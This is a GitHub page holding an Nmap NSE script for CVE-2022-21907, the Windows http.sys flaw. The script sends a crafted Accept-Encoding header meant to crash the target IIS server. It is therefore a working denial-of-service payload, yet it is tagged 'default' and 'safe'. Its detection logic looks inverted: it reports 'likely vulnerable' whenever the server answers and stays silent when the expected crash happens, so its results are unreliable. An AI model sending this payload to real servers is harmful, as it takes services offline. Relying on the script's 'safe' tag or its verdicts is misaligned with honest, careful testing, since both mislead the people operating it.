-
Notifications
You must be signed in to change notification settings - Fork 1
/
nmap-CVE-2022-21907.nse
72 lines (59 loc) · 2.51 KB
/
nmap-CVE-2022-21907.nse
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
description = [[
CVE-2022-21907
Repository containing nse script for vulnerability CVE-2022-21907. It is a component (IIS) vulnerability on Windows. It allows remote code execution. The vulnerability affects the kernel module http. sys, which handles most basic IIS operations.
]]
---
-- @name
-- CVE-2022-21907 - Nse script for vulnerability CVE-2022-21907. It is a component (IIS) vulnerability on Windows. It allows remote code execution. The vulnerability affects the kernel module http. sys, which handles most basic IIS operations.
-- @author
-- Grzegorz Piechnik
-- @usage
-- nmap --script=./nmap-CVE-2022-21907 <target>
-- @output
-- PORT STATE SERVICE
-- 80/tcp open http
-- | nmap-CVE-2022-21907:
-- | VULNERABLE:
-- | CVE-2022-21907 - DOS
-- | State: LIKELY VULNERABLE
-- | IDs: CVE:CVE-2022-21907
---
local http = require "http"
local stdnse = require "stdnse"
local shortport = require "shortport"
local vulns = require "vulns"
author = "Grzegorz Piechnik <bugspace DOT com>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"default", "vuln", "safe", "CVE-2022-21907"}
-- We are only interested in http requests
portrule = shortport.http
action = function(host, port)
-- The buln definition section
local vuln = {
title = "CVE-2022-21907 - DOS",
state = vulns.STATE.NOT_VULN, --default
IDS = { CVE = 'CVE-2022-21907' }
}
local report = vulns.Report:new(SCRIPT_NAME, host, port)
local headers = {
["accept-encoding"] = "AAAAAAAAAAAAAAAAAAAA, AAAAAAAAAAAAAAAAAAAAAAAAA" ..
"BBBBBBBBBBBBBBBBBBBBBBBBBBB&AAAA&**BBBBBBBBBBBBBBBBBb**BBBBBBBBBB, " ..
"CCCCC**CCCCCCCCCCCCCCCCC,CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC" ..
"CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC, " ..
"DDDDDDDDDDDDDDDDDDDd,DDDDDDDDDDDDDDDDDDD,************DDDDDDDDDDDD, " ..
"DDDDDDD****************DDDDDDDD, *, ,"
}
if shortport.http(host, port) then
-- After the payload is submitted, the server should stop working and the request should have no status
stdnse.debug("Sending a constructed request")
local response = http.generic_request(host, port.number, "GET", "/", { header = headers, timeout = 8 })
local status = response.status
if status == nil then
-- Something went really wrong out there
-- According to the NSE way we will die silently rather than spam user with error messages
else
vuln.state = vulns.STATE.LIKELY_VULN
end
return report:make_output(vuln)
end
end